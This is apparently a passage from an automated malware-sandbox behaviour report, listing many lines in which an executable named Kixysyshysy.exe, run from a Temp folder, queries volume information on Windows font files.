Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
